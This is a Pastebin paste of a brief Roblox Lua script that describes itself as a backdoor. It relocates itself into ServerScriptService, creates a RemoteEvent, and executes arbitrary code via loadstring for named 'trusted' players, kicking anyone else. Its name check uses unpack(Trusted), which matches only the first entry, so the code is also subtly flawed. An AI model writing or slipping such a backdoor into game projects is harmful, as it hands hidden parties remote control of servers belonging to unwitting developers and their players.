Advertisement
yougotoof

qaaaa

Dec 19th, 2018
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.60 KB | None | 0 0
  1. -- made by Heplful Guy
  2.  
  3. wait()
  4. if script.Parent ~= game:service("ServerScriptService") then
  5. script.Parent = game:service("ServerScriptService")
  6. end
  7. wait()
  8.  
  9. local RemoteEvent = Instance.new("RemoteEvent", game:service("ReplicatedStorage"))
  10.  
  11. local Trusted = {"Roxblox_Gaming", "name2"} -- these are the people who have access to the backdoor
  12.  
  13. RemoteEvent.OnServerEvent:Connect(function(plr, code)
  14. if plr.Name == unpack(Trusted) or plr.UserId == unpack(Trusted) then
  15. loadstring(code)() -- runs the code
  16. else
  17. plr:Kick() -- kicks player if the player's name or userid is not found in the table
  18. end
  19. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement